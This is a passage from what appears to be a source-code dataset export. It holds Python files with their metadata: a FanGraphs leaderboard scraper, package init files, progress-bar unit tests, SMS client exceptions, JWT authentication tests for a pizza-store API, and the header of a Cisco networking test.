"""
Clicks the **Update** button of the page.
All configured filters are submitted and the page is refreshed.
:raises FanGraphs.exceptions.FilterUpdateIncapability: No filter queries to update
"""
elem = self.page.query_selector("#button-update")
if elem is None:
raise fangraphs.exceptions.FilterUpdateIncapability()
self._close_ad()
elem.click()
self._refresh_parser()
def list_filter_groups(self):
"""
Lists the possible groups of filter queries which can be used
:return: Names of the groups of filter queries
:rtype: list
"""
elems = self.soup.select(".fgBin.splits-bin-controller div")
groups = [e.getText() for e in elems]
return groups
def set_filter_group(self, group="Show All"):
"""
Configures the available filters to a specified group of filters
:param group: The name of the group of filters
"""
selector = ".fgBin.splits-bin-controller div"
elems = self.soup.select(selector)
options = [e.getText() for e in elems]
try:
index = options.index(group)
except ValueError as err:
raise fangraphs.exceptions.InvalidFilterGroup(group) from err
self._close_ad()
elem = self.page.query_selector_all(selector)[index]
elem.click()
def reset_filters(self):
"""
Resets filters to the original option(s).
This does not affect the following filter queries:
- ``group``
- ``stat``
- ``type``
- ``groupby``
- ``preset_range``
- ``auto_pt``
- ``split_teams``
"""
elem = self.page.query_selector(
"#stack-buttons .fgButton.small:nth-last-child(1)"
)
if elem is None:
return
self._close_ad()
elem.click()
@classmethod
def list_quick_splits(cls):
"""
Lists all the quick splits which can be used.
Quick splits allow for the configuration of multiple filter queries at once.
:return: All available quick splits
:rtype: list
"""
return list(cls.__quick_splits)
def set_to_quick_split(self, quick_split: str, autoupdate=True):
"""
Invokes the configuration of a quick split.
All filter queries affected by :py:meth:`reset_filters` are reset prior to configuration.
This action is performed by the FanGraphs API and cannot be prevented.
:param quick_split: The quick split to invoke
:param autoupdate: If ``True``, :py:meth:`update` will be called following configuration
:raises FanGraphs.exceptions.InvalidQuickSplit: Invalid argument ``quick_split``
"""
quick_split = quick_split.lower()
try:
selector = self.__quick_splits[quick_split]
except KeyError as err:
raise fangraphs.exceptions.InvalidQuickSplit(quick_split) from err
self._close_ad()
self.page.click(selector)
if autoupdate:
self.update()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data(".data-export", path)
class WAR(ScrapingUtilities):
"""
Scraper for the FanGraphs `Combined WAR Leaderboards`_ page.
.. _Combined WAR Leaderboards: https://www.fangraphs.com/warleaders.aspx
"""
__dropdowns = {}
__waitfor = leaders_sel.WAR.waitfor
address = "https://fangraphs.com/warleaders.aspx"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.WAR.dropdowns.items():
options = leaders_sel.WAR.dropdown_options[cat]
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> div > ul > li", options)
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__dropdowns))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently set to.
:param query: The filter query being retrieved of its current option
:return: The option which the filter query is currently set to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=1)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
self._close_ad()
if query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
self._refresh_parser()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data("#WARBoard1_cmdCSV", path)
| 36.370986 | 97 | 0.621989 | 3,815 | 32,843 | 5.18768 | 0.078899 | 0.028346 | 0.025567 | 0.020464 | 0.802183 | 0.76363 | 0.740943 | 0.713304 | 0.699106 | 0.694861 | 0 | 0.001148 | 0.283957 | 32,843 | 902 | 98 | 36.411308 | 0.840413 | 0.320342 | 0 | 0.716327 | 0 | 0.002041 | 0.039781 | 0.008055 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126531 | false | 0 | 0.014286 | 0 | 0.267347 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
144437eb7be799a2146a12b331b97f89a5f805f0 | 210 | py | Python | hakai_segmentation/__init__.py | tayden/hakai-segmentation | d8b3ddf7bb5c53144272993e99b6195e56133afd | [
"MIT"
] | 3 | 2022-02-24T05:01:53.000Z | 2022-02-24T21:20:55.000Z | hakai_segmentation/__init__.py | tayden/hakai-segmentation | d8b3ddf7bb5c53144272993e99b6195e56133afd | [
"MIT"
] | null | null | null | hakai_segmentation/__init__.py | tayden/hakai-segmentation | d8b3ddf7bb5c53144272993e99b6195e56133afd | [
"MIT"
] | null | null | null | from hakai_segmentation import geotiff_io, models
from hakai_segmentation.lib import find_kelp, find_mussels
from hakai_segmentation.managers import GeotiffSegmentation
__all__ = ['find_kelp', 'find_mussels']
| 35 | 59 | 0.852381 | 27 | 210 | 6.185185 | 0.518519 | 0.161677 | 0.377246 | 0.227545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090476 | 210 | 5 | 60 | 42 | 0.874346 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
21279ee7c6d0821ee7a34a783cf9aae5ba07b6e0 | 40 | py | Python | sstcam_simulation/utils/sipm/__init__.py | sstcam/sstcam-simulation | 3fb67ba64329c201d3995971e5f377c5ec71b18e | [
"BSD-3-Clause"
] | 1 | 2019-12-23T23:26:36.000Z | 2019-12-23T23:26:36.000Z | sstcam_simulation/utils/sipm/__init__.py | cta-chec/sstCASSIM | 75bb863675991f1a36b7d430f9253ae09416f33e | [
"BSD-3-Clause"
] | 6 | 2020-09-18T10:59:41.000Z | 2022-03-15T11:01:49.000Z | sstcam_simulation/utils/sipm/__init__.py | cta-chec/sstCASSIM | 75bb863675991f1a36b7d430f9253ae09416f33e | [
"BSD-3-Clause"
] | 2 | 2020-04-14T08:01:01.000Z | 2021-11-30T12:11:17.000Z | from .overvoltage import SiPMOvervoltage | 40 | 40 | 0.9 | 4 | 40 | 9 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 40 | 1 | 40 | 40 | 0.972973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2165a684aa6f4ac3936ae4baaab8227957764de5 | 7,027 | py | Python | tests/test_progress_progressbarbits.py | Robpol86/etaprogress | 224e8a248c2bf820bad218763281914ad3983fff | [
"MIT"
] | 13 | 2015-08-25T05:54:21.000Z | 2021-03-23T15:56:58.000Z | tests/test_progress_progressbarbits.py | Robpol86/etaprogress | 224e8a248c2bf820bad218763281914ad3983fff | [
"MIT"
] | 5 | 2015-03-14T16:31:38.000Z | 2019-01-13T20:46:25.000Z | tests/test_progress_progressbarbits.py | Robpol86/etaprogress | 224e8a248c2bf820bad218763281914ad3983fff | [
"MIT"
] | 5 | 2015-05-31T14:16:50.000Z | 2021-02-06T11:23:43.000Z | from etaprogress import eta
from etaprogress.components import misc
from etaprogress.progress import ProgressBarBits
def test_undefined():
misc.terminal_width = lambda: 50
progress_bar = ProgressBarBits(None, max_width=30)
assert '0 b [? ] eta --:-- /' == str(progress_bar)
assert '0 b [ ? ] eta --:-- -' == str(progress_bar)
assert '0 b [ ? ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 10
assert '10 b [ ? ] eta --:-- |' == str(progress_bar)
assert '10 b [ ? ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 100
assert '100 b [ ? ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 1954727
assert '1.95 mb [ ? ] eta --:-- \\' == str(progress_bar)
assert '1.95 mb [ ?] eta --:-- |' == str(progress_bar)
def test_defined():
progress_bar = ProgressBarBits(2000)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- /' == str(progress_bar)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- -' == str(progress_bar)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 102
assert ' 5% (0.10/2.00 kb) [ ] eta --:-- |' == str(progress_bar)
assert ' 5% (0.10/2.00 kb) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 281
assert ' 14% (0.28/2.00 kb) [## ] eta 00:05 -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 593
assert ' 29% (0.59/2.00 kb) [#### ] eta 00:03 \\' == str(progress_bar)
eta._NOW = lambda: 1411868723.5
progress_bar.numerator = 1925
assert ' 96% (1.92/2.00 kb) [############### ] eta 00:01 |' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 1999
assert ' 99% (1.99/2.00 kb) [############### ] eta 00:01 /' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 2000
assert '100% (2.00/2.00 kb) [################] eta 00:00 -' == str(progress_bar)
assert '100% (2.00/2.00 kb) [################] eta 00:00 \\' == str(progress_bar)
assert '100% (2.00/2.00 kb) [################] eta 00:00 |' == str(progress_bar)
def test_defined_rounded():
progress_bar = ProgressBarBits(1999)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 1998
assert ' 99% (1.99/2.00 kb) [############### ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 1999
assert '100% (2.00/2.00 kb) [################] eta --:-- \\' == str(progress_bar)
assert '100% (2.00/2.00 kb) [################] eta --:-- |' == str(progress_bar)
def test_defined_hour():
progress_bar = ProgressBarBits(2000)
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 1
assert ' 0% (0.00/2.00 kb) [ ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 2
assert ' 0% (0.00/2.00 kb) [ ] eta 1:06:36 \\' == str(progress_bar)
def test_defined_wont_fit():
progress_bar = ProgressBarBits(2000, max_width=33)
assert ' 0% (0.00/2.00 kb) [] eta --:-- |' == str(progress_bar)
progress_bar = ProgressBarBits(2000, max_width=30)
assert ' 0% (0.00/2.00 kb) [] eta --:-- /' == str(progress_bar)
def test_defined_long():
misc.terminal_width = lambda: 42
progress_bar = ProgressBarBits(20)
assert ' 0% ( 0/20 b) [ ] eta --:-- -' == str(progress_bar)
assert ' 0% ( 0/20 b) [ ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 1
assert ' 5% ( 1/20 b) [ ] eta --:-- |' == str(progress_bar)
assert ' 5% ( 1/20 b) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 2
assert ' 10% ( 2/20 b) [# ] eta 00:09 -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 3
assert ' 15% ( 3/20 b) [# ] eta 00:09 \\' == str(progress_bar)
eta._NOW = lambda: 1411868723.5
progress_bar.numerator = 4
assert ' 20% ( 4/20 b) [## ] eta 00:08 |' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 5
assert ' 25% ( 5/20 b) [### ] eta 00:08 /' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 6
assert ' 30% ( 6/20 b) [### ] eta 00:07 -' == str(progress_bar)
eta._NOW = lambda: 1411868725.0
progress_bar.numerator = 7
assert ' 35% ( 7/20 b) [#### ] eta 00:07 \\' == str(progress_bar)
eta._NOW = lambda: 1411868725.5
progress_bar.numerator = 8
assert ' 40% ( 8/20 b) [##### ] eta 00:06 |' == str(progress_bar)
eta._NOW = lambda: 1411868726.0
progress_bar.numerator = 9
assert ' 45% ( 9/20 b) [##### ] eta 00:06 /' == str(progress_bar)
eta._NOW = lambda: 1411868726.5
progress_bar.numerator = 10
assert ' 50% (10/20 b) [###### ] eta 00:05 -' == str(progress_bar)
eta._NOW = lambda: 1411868727.0
progress_bar.numerator = 11
assert ' 55% (11/20 b) [####### ] eta 00:05 \\' == str(progress_bar)
eta._NOW = lambda: 1411868727.5
progress_bar.numerator = 12
assert ' 60% (12/20 b) [####### ] eta 00:04 |' == str(progress_bar)
eta._NOW = lambda: 1411868728.0
progress_bar.numerator = 13
assert ' 65% (13/20 b) [######## ] eta 00:04 /' == str(progress_bar)
eta._NOW = lambda: 1411868728.5
progress_bar.numerator = 14
assert ' 70% (14/20 b) [######### ] eta 00:03 -' == str(progress_bar)
eta._NOW = lambda: 1411868729.0
progress_bar.numerator = 15
assert ' 75% (15/20 b) [######### ] eta 00:03 \\' == str(progress_bar)
eta._NOW = lambda: 1411868729.5
progress_bar.numerator = 16
assert ' 80% (16/20 b) [########## ] eta 00:02 |' == str(progress_bar)
eta._NOW = lambda: 1411868730.0
progress_bar.numerator = 17
assert ' 85% (17/20 b) [########### ] eta 00:02 /' == str(progress_bar)
eta._NOW = lambda: 1411868730.5
progress_bar.numerator = 18
assert ' 90% (18/20 b) [########### ] eta 00:01 -' == str(progress_bar)
eta._NOW = lambda: 1411868731.0
progress_bar.numerator = 19
assert ' 95% (19/20 b) [############ ] eta 00:01 \\' == str(progress_bar)
eta._NOW = lambda: 1411868731.5
progress_bar.numerator = 20
assert '100% (20/20 b) [#############] eta 00:00 |' == str(progress_bar)
| 37.37766 | 85 | 0.542764 | 932 | 7,027 | 3.940987 | 0.111588 | 0.275524 | 0.198203 | 0.152736 | 0.772938 | 0.754424 | 0.71658 | 0.703512 | 0.676286 | 0.654506 | 0 | 0.169527 | 0.262132 | 7,027 | 187 | 86 | 37.57754 | 0.538862 | 0 | 0 | 0.257353 | 0 | 0.007353 | 0.318344 | 0 | 0 | 0 | 0 | 0 | 0.382353 | 1 | 0.044118 | false | 0 | 0.022059 | 0 | 0.066176 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dcc064edb2b2474f1395d3ac8ae03ce3be66fffb | 44 | py | Python | camunda/api/__init__.py | IvanovPvl/camunda-py | c46a4258ba28bab3af4b02a5207cd4ea9bd1b6a7 | [
"MIT"
] | null | null | null | camunda/api/__init__.py | IvanovPvl/camunda-py | c46a4258ba28bab3af4b02a5207cd4ea9bd1b6a7 | [
"MIT"
] | null | null | null | camunda/api/__init__.py | IvanovPvl/camunda-py | c46a4258ba28bab3af4b02a5207cd4ea9bd1b6a7 | [
"MIT"
] | null | null | null | # flake8: noqa
from .client import ApiClient | 22 | 29 | 0.795455 | 6 | 44 | 5.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.136364 | 44 | 2 | 29 | 22 | 0.894737 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dcd3ccf860f0f0e28209e9e3058f444bae3f1e0c | 72 | py | Python | src/torch/models/classification/__init__.py | AkibMashrur/dl-pipelines-gcp | 4c2c0a049cd24e21f90566d6b0bf42a3c1e14048 | [
"Apache-2.0"
] | null | null | null | src/torch/models/classification/__init__.py | AkibMashrur/dl-pipelines-gcp | 4c2c0a049cd24e21f90566d6b0bf42a3c1e14048 | [
"Apache-2.0"
] | null | null | null | src/torch/models/classification/__init__.py | AkibMashrur/dl-pipelines-gcp | 4c2c0a049cd24e21f90566d6b0bf42a3c1e14048 | [
"Apache-2.0"
] | null | null | null | from .smallCNN import *
from .twinCNN import *
from .helingerNN import * | 24 | 25 | 0.763889 | 9 | 72 | 6.111111 | 0.555556 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 72 | 3 | 25 | 24 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0d0c715a4bbfa053a5f1d6e062b34f6a3b5a7826 | 38 | py | Python | qarc-gym/qarc/gym_qarc/envs/__init__.py | kasimte/QARC | 0aec7ea3331a912e36ea8003a7f92cee148ed913 | [
"BSD-3-Clause"
] | 40 | 2018-12-03T01:49:15.000Z | 2022-03-20T03:57:03.000Z | qarc-gym/qarc/gym_qarc/envs/__init__.py | kasimte/QARC | 0aec7ea3331a912e36ea8003a7f92cee148ed913 | [
"BSD-3-Clause"
] | 7 | 2020-03-11T09:36:40.000Z | 2021-12-14T01:53:22.000Z | qarc-gym/qarc/gym_qarc/envs/__init__.py | kasimte/QARC | 0aec7ea3331a912e36ea8003a7f92cee148ed913 | [
"BSD-3-Clause"
] | 19 | 2018-11-02T08:07:25.000Z | 2021-09-23T09:57:13.000Z | from gym_qarc.envs.qarc import QARCEnv | 38 | 38 | 0.868421 | 7 | 38 | 4.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 38 | 1 | 38 | 38 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b4a3f7fa6dfad6f59d6d8ebff5e32517bba8c347 | 201 | py | Python | getsms/exceptions.py | kamilgg/getsms | 34b3294df2767b2b62314a0e3f79223dd065eecd | [
"MIT"
] | 1 | 2020-10-05T01:17:09.000Z | 2020-10-05T01:17:09.000Z | getsms/exceptions.py | kamilgg/getsms | 34b3294df2767b2b62314a0e3f79223dd065eecd | [
"MIT"
] | null | null | null | getsms/exceptions.py | kamilgg/getsms | 34b3294df2767b2b62314a0e3f79223dd065eecd | [
"MIT"
] | null | null | null | class APIError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class ServiceAccountError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
| 22.333333 | 37 | 0.691542 | 22 | 201 | 5.590909 | 0.363636 | 0.260163 | 0.357724 | 0.325203 | 0.699187 | 0.699187 | 0.699187 | 0.699187 | 0.699187 | 0 | 0 | 0 | 0.199005 | 201 | 8 | 38 | 25.125 | 0.763975 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
372d3c72d65f581fc445f3b38de62c3c4e5065d0 | 4,163 | py | Python | tests/tests_services/test_auth.py | astsu-dev/pizza-store-backend | 902f6e5e2c88ba029b2bff61da8fc4684664ead9 | [
"MIT"
] | 2 | 2021-07-10T15:47:45.000Z | 2021-12-13T18:09:30.000Z | tests/tests_services/test_auth.py | astsu-dev/pizza-store-backend | 902f6e5e2c88ba029b2bff61da8fc4684664ead9 | [
"MIT"
] | null | null | null | tests/tests_services/test_auth.py | astsu-dev/pizza-store-backend | 902f6e5e2c88ba029b2bff61da8fc4684664ead9 | [
"MIT"
] | null | null | null | import datetime
import uuid
import jwt
import pytest
from fastapi import HTTPException, status
from pizza_store import models
from pizza_store.enums import ProductPermission, Role
from pizza_store.services import AuthService
from pizza_store.settings import settings
def test_get_current_user_with_valid_token() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime + datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(
jwt_payload, key=settings.JWT_SECRET, algorithm=settings.JWT_ALGORITHM
)
result = AuthService.get_current_user()(token)
assert result == models.UserInToken(
username="test",
email="test@example.com",
id=uuid.UUID("ec3365b2-b014-4b2e-ba00-a7fe119d5e09"),
role=Role.USER,
)
def test_get_current_user_with_invalid_secret_key() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime + datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(jwt_payload, key="invalid key", algorithm=settings.JWT_ALGORITHM)
with pytest.raises(HTTPException) as excinfo:
AuthService.get_current_user()(token)
assert excinfo.value.status_code == status.HTTP_401_UNAUTHORIZED
def test_get_current_user_with_expired_token() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime - datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(
jwt_payload, key=settings.JWT_SECRET, algorithm=settings.JWT_ALGORITHM
)
with pytest.raises(HTTPException) as excinfo:
AuthService.get_current_user()(token)
assert excinfo.value.status_code == status.HTTP_401_UNAUTHORIZED
def test_get_current_user_with_valid_required_permissions() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime + datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(
jwt_payload, key=settings.JWT_SECRET, algorithm=settings.JWT_ALGORITHM
)
result = AuthService.get_current_user(
required_permissions=(ProductPermission.READ,)
)(token)
assert result == models.UserInToken(
username="test",
email="test@example.com",
id=uuid.UUID("ec3365b2-b014-4b2e-ba00-a7fe119d5e09"),
role=Role.USER,
)
def test_get_current_user_with_invalid_required_permissions() -> None:
current_datetime = datetime.datetime.utcnow()
jwt_payload = {
"exp": current_datetime + datetime.timedelta(seconds=settings.JWT_EXPIRES_IN),
"iat": current_datetime,
"user": {
"id": "ec3365b2-b014-4b2e-ba00-a7fe119d5e09",
"username": "test",
"email": "test@example.com",
"role": Role.USER,
},
}
token = jwt.encode(
jwt_payload, key=settings.JWT_SECRET, algorithm=settings.JWT_ALGORITHM
)
with pytest.raises(HTTPException) as excinfo:
AuthService.get_current_user(required_permissions=(ProductPermission.CREATE,))(
token
)
assert excinfo.value.status_code == status.HTTP_403_FORBIDDEN
| 32.779528 | 88 | 0.649291 | 451 | 4,163 | 5.767184 | 0.150776 | 0.086505 | 0.053825 | 0.053825 | 0.893887 | 0.893887 | 0.893887 | 0.852749 | 0.836217 | 0.836217 | 0 | 0.0445 | 0.233485 | 4,163 | 126 | 89 | 33.039683 | 0.770605 | 0 | 0 | 0.633028 | 0 | 0 | 0.131636 | 0.060533 | 0 | 0 | 0 | 0 | 0.045872 | 1 | 0.045872 | false | 0 | 0.082569 | 0 | 0.12844 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2eaa61ee4197b6441b8f0a07311b161ad49c65b0 | 34 | py | Python | ketting/__init__.py | Branthalt/blockchain | f345b7ec3b5a9c930a691366ee5adfec8d2a096a | [
"MIT"
] | 1 | 2019-04-14T06:01:11.000Z | 2019-04-14T06:01:11.000Z | tibc/__init__.py | manparvesh/tibc | 8fcb233e2e33c2c90708e6bde0fb68a36a18f963 | [
"MIT"
] | 1 | 2018-03-11T20:54:42.000Z | 2018-07-07T19:32:39.000Z | tibc/__init__.py | manparvesh/tibc | 8fcb233e2e33c2c90708e6bde0fb68a36a18f963 | [
"MIT"
] | 1 | 2018-06-09T07:59:37.000Z | 2018-06-09T07:59:37.000Z | from .blockchain import Blockchain | 34 | 34 | 0.882353 | 4 | 34 | 7.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2efc1d216bf6ff422ca112a94547a8b52048d335 | 27,950 | py | Python | networking_cisco/tests/unit/cisco/cfg_agent/test_asr1k_routing_driver.py | armando7santana/Networking-Cisco | 6f281bec239c0ae186490e434ce7794117880c69 | [
"Apache-2.0"
] | 1 | 2019-01-19T09:12:49.000Z | 2019-01-19T09:12:49.000Z | networking_cisco/tests/unit/cisco/cfg_agent/test_asr1k_routing_driver.py | armando7santana/Networking-Cisco | 6f281bec239c0ae186490e434ce7794117880c69 | [
"Apache-2.0"
] | null | null | null | networking_cisco/tests/unit/cisco/cfg_agent/test_asr1k_routing_driver.py | armando7santana/Networking-Cisco | 6f281bec239c0ae186490e434ce7794117880c69 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import mock
import netaddr
from oslo_config import cfg
from oslo_utils import uuidutils
from neutron.tests import base
